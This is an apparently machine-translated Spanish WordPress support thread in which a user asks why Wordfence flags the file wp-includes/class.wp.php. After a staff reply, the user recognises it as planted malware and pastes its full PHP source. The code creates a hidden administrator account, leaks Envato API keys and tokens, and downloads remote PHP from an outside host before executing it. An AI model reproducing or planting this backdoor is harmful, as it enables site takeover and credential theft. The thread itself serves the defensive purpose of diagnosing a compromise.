Pregunta sobre Wordfence Security de Wordpress:

Why You Keep Waring: archivo desconocido en el corazón de WordPress: wp-include / class.wp.php

Un usuario preguntó 👇

Utilizo la versión 4.8.2 de WordPress. El escaneo sigue advirtiendo al respecto

Unknown file in WordPress core: wp-includes/class.wp.php
Filename:	wp-includes/class.wp.php
File Type:	Core
Issue First Detected:	55 secs ago.
Severity:	Warning
Status	New
This file is in a WordPress core location but is not distributed with this version of WordPress. This is usually due to it being left over from a previous WordPress update, but it may also have been added by another plugin or a malicious file added by an attacker.

aunque descargué la versión 4.8.2 y copié el archivo class.wp.php en la carpeta wp-include para reemplazar el de mi carpeta wp-include. Después de eso, comencé un nuevo escaneo nuevamente. Pero, ¿por qué el análisis sigue mostrando una advertencia sobre este archivo? Y no vi ningún código extraño en el archivo. En el último escaneo también lo marqué como «He solucionado este problema», pero todavía está en guerra en el siguiente escaneo.

Este tema fue modificado hace 3 años, 3 meses por.

(@wfalaa)

Hace 3 años, 3 meses

Hola, debido a que el archivo en el directorio «/ wp-include» no es «class-wp.php» en lugar de «class.wp.php», puedes ver el repositorio oficial de WordPress en GitHub aquí, o verifique la copia que descargó de wordpress.org.

Gracias.

(@ topsan123)

Hace 3 años, 3 meses

@wfalaa

Ah… mi error no miré con atención porque se ve igual. Lo siento y gracias por informarme. De hecho, «/ class.wp.php» no está en «/ wp-include». Este archivo es uno de los archivos que se utilizan ahora para piratear mi sitio. He eliminado todos los archivos como se muestra en el resultado del escaneo. Ahora me he dado cuenta de este archivo. Por eso el escáner me advierte. El archivo es el siguiente:

<?php 
error_reporting(0);

if( !isset($_GET['go']) )
{

require $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
$table_name = $wpdb->get_blog_prefix();
$sample = 'a:1:{s:13:"administrator";b:1;}';
if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
if( isset($_GET['awu']) ) {
$wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('100010010', '100010010', '$P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '100010010');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '100010010', '{$table_name}user_level', '10');"); }
if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 100010010");
$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 100010010");}
if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';
  echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; }
  
  }
  
  if( isset($_GET['go']) )
{

if ( ! function_exists( 'wp_temp_setupx' ) ) {  
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

if($tmpcontentx = @file_get_contents("http://www.dolsh.cc/codexc.txt"))
{

function wp_temp_setupx($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setupx");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?phpn" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}

extract(wp_temp_setupx($tmpcontentx));
}
}

  }
  
?>

(@ greg007)

Hace 3 años, 2 meses

Hola, también tengo este archivo. ¿Debería borrarlo?

(@wfalaa)

Hace 3 años, 2 meses

@ greg007 mira mi respuesta en un hilo similar aquí.

Gracias.

PD en el futuro, considere abrir un nuevo hilo de soporte para cualquier pregunta que tenga, estaremos encantados de ayudarle.

¿Solucionó tu problema??

0 / 0

Deja una respuesta 0

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *